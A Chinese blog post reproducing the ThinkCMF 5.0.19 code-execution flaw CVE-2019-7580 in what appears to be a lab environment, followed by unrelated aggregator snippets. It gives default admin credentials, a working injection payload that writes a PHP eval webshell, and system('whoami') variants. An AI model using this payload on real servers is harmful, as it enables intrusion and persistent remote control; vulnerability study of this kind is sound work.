代码编织梦想

所有文章,仅供安全研究与学习之用,后果自负!

thinkcmf 代码执行 (CVE-2019-7580)

复现小心会搞崩环境。

0x01 漏洞描述

ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf 5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。

这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞.

将payload插入数据库,写入data/conf/route.php文件

程序的入口是index.php,在index.php中\think\App::run()执行应用。

在App.php的run()函数139行,执行sef::exec();

0x02 影响范围

5.0.190111

0x03 漏洞复现

3.1 登录后台

admin 123456
/user/login/index.html
在这里插入图片描述

3.2 漏洞利用

3.2.1webshell

url:

http://118.193.36.37:34311/portal/admin_category/addpost.html

post 请求包:

parent_id=0&name=111&alias=1'=>array(""),file_put_contents('/var/www/html/public/shell.php','<?php eval($_POST[cmd]);?>'),'2

在这里插入图片描述
在根目录shell生成 文件 连接
在这里插入图片描述

3.2 phpinfo

/admin/index/index.html#/portal/admin_category/index.html
门户管理-》分类管理-》添加分类-》
在这里插入图片描述
在这里插入图片描述

3.3 获取系统命令

1’=>array(“”),system(‘whoami’),‘2
1’=>array(“”),system(‘pwd’),'2

0x04 漏洞修复

升级版本

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/124682604

干货|常用渗透漏洞poc、exp收集整理-爱代码爱编程

                                                                                                                       CVE-2014-4113 Win64bit本地提权漏洞CVE-2014-4878 海康RCE漏洞CVE-2017-01

thinkphp v5.0.11漏洞_ThinkPHP 5.0再曝远程代码执行漏洞-爱代码爱编程

https://nosec.org/home/detail/2163.html2019年1月11日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞。主要影响的版本为5.0.0~5.0.23版本。 此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.0版本于2016年的9月份布。在不

Getshell总结-爱代码爱编程

按方式分类: 0x01注入getshell: 0x02 上传 getwebshell 0x03 RCE getshell 0x04 包含getwebshell 0x05 漏洞组合拳getshell 0x06 系统层getcmdshell 0x07 钓鱼 getcmdshell 0x08 cms后台getshell 0x09 红队shell竞争分析

[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现 (CVE-2019-7580)phpinfo();ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH-爱代码爱编程

前言 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。 文章也会在这里同步 0x01进入后台 进入后台路径为:http://ip:port/admin 0x02我们这里使用弱口令登录 账

2022年计算机软件水平考试信息安全工程师(中级)练习题及答案-爱代码爱编程

1、在云计算虚拟化应用中,VXLAN技术处于OS工网络模型中2-3层间,它综合了2层交换的简单性与3层路由的跨域连接性。它是通过在UDP/IP上封装Mac地址而实现这一点的。在简单应用场合,vxLAN可以让虚拟机在数据中心之间的迁移变得更为简单。该技术是哪个公司主推的技术(C) A.惠普 B.Juniper C.Cisco与Vmware D.博

《2021年最经常被利用的漏洞》信息发布-爱代码爱编程

 CVE:Common Vulnerabilities and Exposures 中文名:公共漏洞和披露       CVE没有官方的中文简称,大致为一个公共漏洞和披露的库,相当于一个搜集诸多安全漏洞的漏洞库,不同的漏洞信息对应着一个不同的CVE编号,申请CVE即申请一个CVE编号。       官方网址:       http://cve.

高防IP是不是一定能防住DDOS攻击-爱代码爱编程

首先要了解高防IP是什么?其次要了解高防IP都可以给你防御一些什么东西? 这一篇小蚁君给你们深入科普以下高防IP到底是个什么东西? 为什么大厂卖的那么贵?为什么高防IP理论上可以解决目前市面上所有的ddos攻击 为什么高防IP对于ddos有效果? 好了 现在来了解, 高防IP是什么? 通俗说法:DDoS是针对客户在线服务端(如网站、APP)发

2022渗透测试面试大全(过来人的全部家底)_渗透岗位比较好面试的公司-爱代码爱编程

大家可以关注关注我的公众号 定期分享一些干货 直接搜索-小白渗透测试 面试过很多次渗透测试岗位,整理的面试题改了又改,这是我的最终版本,绝对的干货,记得收藏保存。 目录 渗透测试流程 业务逻辑漏洞 挖到过的漏洞 sql注入 跨站脚本攻击XSS CSRF跨站请求伪造 SSRF服务器端请求伪造 文件上传

06_《计算机安全原理与实践》访问控制_基于角色的访问控制 (rbac) 的核心组件必须由定义的数据元素构成。需要哪些元素-爱代码爱编程

06_《计算机安全原理与实践》访问控制 1. 访问控制原理 【访问控制的概念】 不同机构对访问控制的定义是不同的,广义角度上来说,访问控制与所有的计算机安全相关领域密切相关(以sql注入为例,如果发现当前注入网站的数据

spring security 重写密码比对类daoauthenticationprovider-爱代码爱编程

1.需求 前端使用了RSA加密密码,到后端时,需要先解密,然后进行对比。 2.DaoAuthenticationProvider介绍 Spring security 获取用户信息并进行密码验证,使用的是 Da